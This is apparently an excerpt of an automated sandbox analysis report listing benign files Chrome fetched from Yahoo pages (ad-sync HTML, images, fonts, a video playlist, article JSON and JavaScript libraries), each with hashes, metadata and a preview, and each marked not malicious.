                                                                                                                                                                                                                  URL:https://rtb.gumgum.com/usync/prbds2s?gdpr=0&gdpr_consent=&us_privacy=1YNN&r=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dgumgum%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Db%26uid%3D
                                                                                                                                                                                                                  Preview:<html><head><title></title></head><body>.<img src="https://secure.adnxs.com/getuid?https://usersync.gumgum.com/usersync?b=apn&i=$UID" style="display:none;"/>.<img src="https://x.bidswitch.net/sync?ssp=gumgum2&user_id=e_ca72d27a-ff05-416a-ab76-b50c86f09aee&gdpr=0&gdpr_consent=&us_privacy=1YNN" style="display:none;"/>.<iframe src="https://c1.adform.net/serving/cookie/match?party=1301&gdpr=0&gdpr_consent=" style="display:none;"></iframe>.<img src="https://us-u.openx.net/w/1.0/cm?_={CACHEBUSTER}&id=47f31213-389c-4904-aaa6-9b11aab9c211&gdpr=0&gdpr_consent=&us_privacy=1YNN&r=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dopx%26i%3D" style="display:none;"/>.<img src="https://sync.srv.stackadapt.com/sync?nid=1&gdpr=0&gdpr_consent=" style="display:none;"/>.<iframe src="https://cm.g.doubleclick.net/pixel?google_nid=gumgum_dbm&google_hm=ZV9jYTcyZDI3YS1mZjA1LTQxNmEtYWI3Ni1iNTBjODZmMDlhZWU=&gdpr=0&gdpr_consent=&google_redir=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dgdv" style="display:
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, progressive, precision 8, 970x250, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):111945
                                                                                                                                                                                                                  Entropy (8bit):7.97126150924802
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:3B7B3B633F1D496C35550E39B0F3CB41
                                                                                                                                                                                                                  SHA1:914F5198F179DE770B176338C3556016BB3EFC8A
                                                                                                                                                                                                                  SHA-256:BB5EB1DF5B41C7F01D60927E85F0E30D0493452F8E2BCD797959A665F5E14D87
                                                                                                                                                                                                                  SHA-512:1F1BA7FED07BDE25A9C40530B6E0B0C3EB9B6D85B79E04804A26373496BD5F70594A257EB855BAF7F62D17C4BE8B9ABE15F61D42328FE616AD204E2AE5CABD79
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/cv/apiv2/default/20181213/Finance_Brand_Filler__970x250_Look_1.jpg
                                                                                                                                                                                                                  Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):147
                                                                                                                                                                                                                  Entropy (8bit):4.953206807486852
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:ADD5A065A5C72CBB004BE141B147B8E9
                                                                                                                                                                                                                  SHA1:8ED3CDC5C5E395105E9283A06810DA362F5D520A
                                                                                                                                                                                                                  SHA-256:A1C28FF0CF217F7D174ACE1BB7133068E7958ED0CD5F11BF66DA7ABCA9754958
                                                                                                                                                                                                                  SHA-512:D0F4335059CD8CB50E701BA28000845F5AABCD1115B8211B96A6311C2C97A6BDE56A7EDD0DB826A851B2AFEEDD272C47DF9BD5F4C9E9C66280F7BA0AE222B4FC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"timestamp":"2024-10-04T14:39:49.810+00:00","path":"/admax/bid/partners/YPBJS","status":404,"error":"Not Found","requestId":"0ef48987-3441739286"}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text, with very long lines (958)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):12613
                                                                                                                                                                                                                  Entropy (8bit):6.03642748293687
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:113C27C9A195DC2EF8E2E0CCE7E3E2CF
                                                                                                                                                                                                                  SHA1:04CB04C87C707D04D40CDABDA2741C7756A6F516
                                                                                                                                                                                                                  SHA-256:9B4DA210F1350E276919C4D865DBB3145B17380ADC95DB4AE4523D9006B9351F
                                                                                                                                                                                                                  SHA-512:EDB51106F7558F50462972693775D780D5B64ADED046A5B8B1B5FA68CD5E48AFA26E20F94E021982DEA6FF73F418EA5DC738019418FB3135DEF300C8D43F2217
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://manifest.prod.boltdns.net/manifest/v1/hls/v4/aes128/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/6s/master.m3u8?fastly_token=NjcwMDBjNTBfNjQ2NmNkNWVkMTY1ZDMwMGJhYWZhOWJjZGNmNWZkMzU3NThjMTZhMzVhMzc4MmIyN2MwY2M5ODY5ZTEzNjUxYw%3D%3D&bcov_auth=eyJhbGciOiJSUzI1NiJ9.eyJhY2NpZCI6IjY0MTU2NjU4MTUwMDEiLCJhdWQiOlsicGxheWJhY2suYXBpLmJyaWdodGNvdmUuY29tIl0sInBraWQiOiI5MjE4NDMyMC04ZmYzLTQ1ZTktYjYwMC05OTBmODIyYzg2NjciLCJleHAiOjE3MjgwNTMwOTQsImlhdCI6MTcyODA1Mjc5NH0.P_N1csFdXh8Ns9i7OSTfiDOpM-6jeDJ5F71Ovd-LRHSg0XTQm_KG2axeK-PrgfXOLuaVU1pxCvDw9HlTSmJA688eG4BF29834YK6ZyInrp3AmJ9kl9zA6FWjBU2B50gl8Xvtb6baYQqZO1khmo9xIvIsjozGtaL2GHvTwgC1NJdZHib-INaSwQhZ49zxaE19I0Qv7yuVNbdI4kLakOq1p_n26A7WAev-CoKiKyObUiGqMv-VPeSiODvHHhv3HVCNUwEucbONPRHIEMSPnDz82E5SXoLdP_pVkPx_Enmnhp2k1uAG536A2fZdcSA6iFIbr5CGrlcOwPJwR5aVUyBFXQ
                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-VERSION:4.#EXT-X-MEDIA:TYPE=AUDIO,GROUP-ID="audio-0",NAME="en (Main)",DEFAULT=YES,AUTOSELECT=YES,LANGUAGE="en",URI="https://manifest.prod.boltdns.net/manifest/v1/hls/v4/aes128/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/ad3e18d4-1bff-4b65-b5a9-f69cd5724579/6s/rendition.m3u8?fastly_token=NjcwMDU2NzdfMDc2MWVlY2Y1Zjg2NDQzM2UyYWVmMzBhMmQxZGVlNmRhZWM2YWZjMGIxZWFkNjQwZDYzYjYyODkzZGNkN2I4Ng%3D%3D&bcov_auth=eyJhbGciOiJSUzI1NiJ9.eyJhY2NpZCI6IjY0MTU2NjU4MTUwMDEiLCJhdWQiOlsicGxheWJhY2suYXBpLmJyaWdodGNvdmUuY29tIl0sInBraWQiOiI5MjE4NDMyMC04ZmYzLTQ1ZTktYjYwMC05OTBmODIyYzg2NjciLCJleHAiOjE3MjgwNTMwOTQsImlhdCI6MTcyODA1Mjc5NH0.P_N1csFdXh8Ns9i7OSTfiDOpM-6jeDJ5F71Ovd-LRHSg0XTQm_KG2axeK-PrgfXOLuaVU1pxCvDw9HlTSmJA688eG4BF29834YK6ZyInrp3AmJ9kl9zA6FWjBU2B50gl8Xvtb6baYQqZO1khmo9xIvIsjozGtaL2GHvTwgC1NJdZHib-INaSwQhZ49zxaE19I0Qv7yuVNbdI4kLakOq1p_n26A7WAev-CoKiKyObUiGqMv-VPeSiODvHHhv3HVCNUwEucbONPRHIEMSPnDz82E5SXoLdP_pVkPx_Enmnhp2k1uAG536A2fZdcSA6iFIbr5CGrlcOwPJwR5aVUyBFXQ".#EXT-X-STREAM-INF:
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:444BCB3A3FCF8389296C49467F27E1D6
                                                                                                                                                                                                                  SHA1:7A85F4764BBD6DAF1C3545EFBBF0F279A6DC0BEB
                                                                                                                                                                                                                  SHA-256:2689367B205C16CE32ED4200942B8B8B1E262DFC70D9BC9FBC77C49699A4F1DF
                                                                                                                                                                                                                  SHA-512:9FBBBB5A0F329F9782E2356FA41D89CF9B3694327C1A934D6AF2A9DF2D7F936CE83717FB513196A4CE5548471708CD7134C2AE99B3C357BCABB2EAFC7B9B7570
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://login.yahoo.com/logads?adType=gam&delay=timeout&spid=794200018
                                                                                                                                                                                                                  Preview:ok
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 34588, version 0.0
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):34588
                                                                                                                                                                                                                  Entropy (8bit):7.991674784180286
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:492A0A160B8DA9414134282EF8B62F78
                                                                                                                                                                                                                  SHA1:25F704E7B3C6972FF84BA95D4E92E807AB15F38B
                                                                                                                                                                                                                  SHA-256:318D39388D650F931CFD5283AB5DA11570BC0C6B1A85360BCBF03D3656D2EA8A
                                                                                                                                                                                                                  SHA-512:CA28ED371E6846E108297FAF0C4C1A5DE7E3409F535D2B63365B27CB12400C7AEAE9EF0169BB318533D12D74CDD9102470F1C7FC8EEE58C2BA22056FDB2AD3E2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/bw/fonts/yahoo-sans-cr4-vf.woff2
                                                                                                                                                                                                                  Preview:wOF2..............................................$...H..B.`?STATd'..../B...$.r0...6.$..l..... ..V. [..q.F.....!..}XDU.d.......U...~..?../.....?B...Gx.6.)...9..p'>.p'>..4..p.Wa..*......e.i..Y.s>d!..PdY.N.".,.s:..)..g_..o.^.37.....,.....3..L..Lol.S..[.2s..L.H#..<.P.)$.(.^.x..B....)....Z....|..O...:... <}.1...z=.M.^..p....l.[2....e..f(.eKf.{...{.C"..)..]..D.I..#"...$".4..H....|<x....D..A.{....s%I..)K.>di....H.4..b.;..Sg.Sq...V.x*...z..K..A|.^W.Y9.....L.]Z,:...'C8@.QI......YN.].v.Y`..K .....T@Hz.$K...`....eZ..6.....].s..P...E..nP@......h...z.fKm.-....7......f......Ex`k..gH7.{KA%&].!.,...Z7."i..B...:i.t...@......=.f.y.]....Hh$...Clc..l.I.b...8&....Lf.2[...z.....|..I..d..&.1.(!O$.<..@.|\QN...}k.-B ........`...$....."D.._..\QD..iW..q..K~.....%.`........O.(.F.Y..+......E.9!.."M.=..}....D..}.h.\.(v(.'..w..h....z.......V.[q.....Y....bp.G`.......p......C..MS..g.a.y.h*.o...ue..#...lL.....p.)..]../....f.DH....&..@......4fp..7.H. `...-..l..#..S..sQ..j
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):23535
                                                                                                                                                                                                                  Entropy (8bit):7.97273379521699
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:CD39AB2BC1035414BABDA994E97ACC55
                                                                                                                                                                                                                  SHA1:FA5DD3FF52C2112207E105EC5164F89852EBD456
                                                                                                                                                                                                                  SHA-256:631DD9C93C4DC73B5DDE594C19C44D933A64B9C6632A80EAE1F89C7A2184F542
                                                                                                                                                                                                                  SHA-512:17AEBC725315F414D670A9D5D2D940AF5365594C702CC0D7B6B1403480AAB765278C8930B6F8ACF546A9EF329FA61FB0DA89B762C75A6DF235C043804C7306BD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/20s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/20s/match/image.jpeg*~hmac=6e7dd72cab8c96f293c4b14a214fe9e4c3acb942ad9f6cd708cfdb36c1c5df1d
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C......................"....)$+*($''-2@7-0=0''8L9=CEHIH+6OUNFT@GHE...C.......!..!E.'.EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE..........."........................................R.........................!1.."AQaq...2.....#BRT...b....$3CSrs..%46D..c...&EUdt.................................*......................!.1.AQ.a"q..#2................?.;..,.4Sj...J.>..eC>.....Y.c<..N=}kC....0F.bpFA.....\.$]....P..8.....rIB7fk.`#..[v.m........L........n..$.{)...N..q1b...s.G...i...h]...*.3..H.{+.8)4.^Y.....*.P..>...|9.O..^,...98..ui%.1.......I>t...P..F@=+w...hk._L...]...m...m)..T5.....+D../....qV._..06......8.?.%..,..$....3.....:N..l2m......I.J.z..#.B}.kh...yeWg9.D.`.cm>......M.Sc....3...iE..rr.a..c..'l....'.Tc.:KB\.k...O.a......U.......G.G..J...4..2..i.>...s.,.#S.F.U^....Ky..z].9.G........Gt..r}..Wgd,.2....YO.&..?.;.0F9A.l/.=....WY1...@?.?.m..`.....+...N.......=+...E/.1.nW*...#.zW.\....=....HL..c..5pr3]..X.y.....Qo....)
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):388970
                                                                                                                                                                                                                  Entropy (8bit):5.544253531191392
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:8C69CD80875741E1411188AC47EE4883
                                                                                                                                                                                                                  SHA1:D99918E16A24178E41C825D4FCF6741D8AD37D2C
                                                                                                                                                                                                                  SHA-256:5603E3A2E38F56B24E52672EACE2176833E57255859DB507C31173904B09202B
                                                                                                                                                                                                                  SHA-512:38575167DFD205C2D7C410EC031AA6DC1C8B6123BC538C43E1534CEB2E42C2290ECA50D8422D872CB845EF63ACE061587421FE306AE355614A997BB194533C6B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:"https://www.yahoo.com/caas/content/article/?uuid=450dc40b-63a5-3d02-af4f-17313c93074f,656a7c07-7bf0-3a60-8d7c-ebb107fb26e1,d8d4e789-68dc-3f20-9b98-b97c32d2995b,8ffa4262-dbfc-3498-b8e5-e06281d584d4,9704d5f5-4db2-3d38-9400-815f3626e561,6399512f-5bcf-36f4-ac94-25a4e5318bc6,34df07e6-e611-3c78-8aeb-c26302bba779,de171e6e-37e6-3b00-8f33-4639fcd8c351,1f478978-5463-38dd-bb71-67a1a1222643,bc526f4c-affd-3262-b6b5-29d32e67c7bc&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=TNBE003,USNELT-ReactInRMP-commerce-ctrl-1004,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=64cl5gdjfvvgt"
                                                                                                                                                                                                                  Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"politics","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a0W00000LRNm8QAH;revsp:nbc_news_122;lpstaid:450dc40b-63a5-3d02-af4f-17313c93074f;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Donald_Trump;Jack_Smith_%28lawyer%29;United_States_Department_of_Justice;Tanya_Chutkan;Criminal_procedure;United_States_presidential_election;2020_United_States_presidential_election;Special_counsel;United_States_Attorney;Chuck_Rosenberg;Indictment;Supreme_Court_of_the_United_States\" ctopid=\"1996000\" hashtag=\"1996000\" rs=\"lmsid:a0a0W00000LRNm8QAH;revsp:nbc_news_122;lpstaid:450dc40b-63a5-3d02-af4f-17313c93074f;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"news","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=trump-claims-jack-smith-filing-194124013","canonicalSite":"news","canonicalUrl":"https://www.yahoo.com/news
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1650
                                                                                                                                                                                                                  Entropy (8bit):5.159978002033735
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:03C10F2C4E36A75805F7735D1F07C98C
                                                                                                                                                                                                                  SHA1:DAEF61F97758BEF6CE593D34998F5F8EA7E20E7D
                                                                                                                                                                                                                  SHA-256:0F7D51EA19F78212DBF64706C7CCEB771E3D7B6390057BD4E44355B2850B1DA5
                                                                                                                                                                                                                  SHA-512:26C726B47435AAF67BA01633AA75F50E48718A494FF19C0E2BD9AD58D070508AE9C8A14255EA0BF5A754BFBA2F6C4BD4D20632A31464478DF74EE68F10C59465
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/cv/apiv2/weather-svg/MOSTLY_SUNNY.svg
                                                                                                                                                                                                                  Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <defs>. <linearGradient x1="-36.396%" y1="32.854%" x2="33.396%" y2="133.313%" id="a">. <stop stop-color="#FFF5B2" offset=".013%"/>. <stop stop-color="#FFDE00" offset="39.944%"/>. <stop stop-color="#FFA700" offset="100%"/>. </linearGradient>. <linearGradient x1="115.053%" y1="97.289%" x2="115.053%" y2="-17.557%" id="b">. <stop stop-color="#FFB92B" stop-opacity=".05" offset="0%"/>. <stop stop-color="#FF6900" offset="100%"/>. </linearGradient>. <linearGradient x1="64.278%" y1="100%" x2="64.278%" y2="1.351%" id="c">. <stop stop-color="#B5BDC8" offset="0%"/>. <stop stop-color="#C7CDD2" offset="21.044%"/>. <stop stop-color="#E5EBEF" offset="100%"/>. </linearGradient>. <path d="M20.464 26.12c-4.225-.75-8.257 2.1-9.051 6.396a5.422 5.422 0 00-5.252 2.062 5.67 5.67 0 00-.693 5.694 3.006 3.006 0 002.792 1.727h10.855c4.085.022 7.5
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                  Entropy (8bit):4.496574330097901
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:1B177A4068E01AC77B85B091C87251BD
                                                                                                                                                                                                                  SHA1:EA7A08A7C139D4A7512B6BAAB5AAC4A3E288B255
                                                                                                                                                                                                                  SHA-256:F77F47058428A1C21DAD5A75AC13FBFDEB9858947218FEE2112FDED5972A0B5D
                                                                                                                                                                                                                  SHA-512:6E6D693775AA9C94540D0CA0549C98446048189D49A3716895F62C3EFE3893F0B28FEDACDCD46394782B7972D0B981E87EA291E76EF2490258FCABA2A0906D92
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:window.advBidxc.mnetRtusId({"status":"Unknown","userid":""});
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (33589), with LF, NEL line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):58753
                                                                                                                                                                                                                  Entropy (8bit):5.26167812703519
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:A9C11221224C7869C6B916618D892612
                                                                                                                                                                                                                  SHA1:39C436EE6D2AFD6F851840AB4673C56CE0372D3E
                                                                                                                                                                                                                  SHA-256:7B48A74FA0F94D83AE6D60C772F5E7AA66E7BE1B63CCF223CA14E34D3D7B0D22
                                                                                                                                                                                                                  SHA-512:EA05BD1555D819AA35985D16EDA15F9A3805DA01F192156157739E30CE2A22D2888F8E4D1A2ED7A3FC2739CEF848B7EE882A5A628B3657E27AF979FE8F0EB09D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://hbx.media.net/pubcid.php?itype=HB&cb=window.advBidxc.mnetCoRtusId
                                                                                                                                                                                                                  Preview:try{ window.__mNPubCidCB = window.advBidxc.mnetCoRtusId ;/*. * This Source Code Form is subject to the terms of the Mozilla Public. * License, v. 2.0. If a copy of the MPL was not distributed with this file,. * You can obtain one at https://github.com/conversant/pubcid.js/blob/master/LICENSE. * Original github code https://github.com/conversant/pubcid.js. */.!function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"s
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (14567), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14567
                                                                                                                                                                                                                  Entropy (8bit):5.233891295924048
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:FF6533FEBE2F4FB2E2DBAA32B38C5D20
                                                                                                                                                                                                                  SHA1:8B293E36B0E1C49F68C3D7F93968A0101A372324
                                                                                                                                                                                                                  SHA-256:7CD57326970A4C3C96D26E9B5F95C3021E823A747DC0D55B89745075F3678FD2
                                                                                                                                                                                                                  SHA-512:C8923B35A32E17F097602400992875496B49EBDDB9C8DDAC882D2EB835C190C1FB8DD1FF888BDDE1ADA67B3725CBDCE0A23C96A7DFA8799A2E0566A548B989C1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-tabs",[],e):"object"==typeof exports?exports["wafer-tabs"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-tabs"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(i){if(a[i])return a[i].exports;var o=a[i]={i:i,l:!1,exports:{}};return t[i].call(o.exports,o,o.exports,e),o.l=!0,o.exports}var a={};return e.m=t,e.c=a,e.d=function(t,a,i){e.o(t,a)||Object.defineProperty(t,a,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){var a=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(a,"a",a),a},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,a){"use strict";function i(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function o
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 340x179, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11028
                                                                                                                                                                                                                  Entropy (8bit):7.961125074176423
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:94E76FB91C05092B9843C1DDC5DA355E
                                                                                                                                                                                                                  SHA1:841B24C89BB999CB6DE8984BB0A53C25BFACD1B3
                                                                                                                                                                                                                  SHA-256:919579C4F92372C9DD0287969CA8BEE6A9A9F67BE527A464F28D67B3274C1EE2
                                                                                                                                                                                                                  SHA-512:0DB747A53337E55FBD061AF6D2C6976AF9C02C126498101855B8255FFB2CFA20B377AFA412831E69C58F896EBFA487773E8F66EF65465577E715DD583F403D2E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici...........T.."..........4...................................................................q...&.R.H=..f$r2....p..A..E....j....W!Sr...t7N..xF.`.@.i....HN.0.H...I.$.$._...."S&.S...t#s.6...I.^....I.A..Sx./..m(]....!......d.y.|..z[..FJ.H.TK...M.%.Uh1\..P.n.J^6.......M..;.......T....t..L.....v...W...y=P..o_.q...Y...{F.RrPl%...;#....Q.F.\U.....1....^.*7........Qq-p.e....&....E..A....n.'T....=,^...V.n[........|.36...S.......S...I.E....s...t$.DALd......./..d.j....!..C....y."H...FW;......0....3 n..68...Q...t?9.e...*....I@.&...\.S.....R.[.Z(.K..5..zn..K.}......>.H....!^.`%....t.....Y.D..).5A..O..P.h..._B..Cc+N...g.^:.....[G....v.'..../{F.].&.'H..?1.........O.IO..6.....ge..k..x..........(0zF.cC.w.2r..]..i,U~.....s...tx...h.....F.B..p..v|.F.a..'..tv...|;->:.[.Y$>..4n..V..F,=M..S/..sbzp...
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:PNG image data, 12 x 12, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):254
                                                                                                                                                                                                                  Entropy (8bit):6.862340972505271
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:DFA7B52C86E56BD67FA4002F6ED19854
                                                                                                                                                                                                                  SHA1:7DF722645482433C2B5C8D8AB4272A9874592F27
                                                                                                                                                                                                                  SHA-256:F68019EB4B4E5933301D4EE75969E0CB94ED8333BF514630FA749EB9C3E483C9
                                                                                                                                                                                                                  SHA-512:562D75C4540B7EBFE43FF28A4134C813E7E1BD1562F1E722FA62193E1315D4D2800150E0E3680F09BEDF004B96D6B22BF63AF8B32589CF469663BEDB4C59EE5D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                                                                                                                                                                                                                  Preview:.PNG........IHDR..............|.l....IDAT.W=.1R.P.....J.'J.%....p...(.i@....p.1..E..|.x..cBL .3.. ...,((X...0J.{.....;..#.O.U....K..f..1...A=.K...s....n...`....w+.-k.. ..=..?./sYp...Vmn..f....f..yr..AT.g...,..;...@........}.S.......IEND.B`.
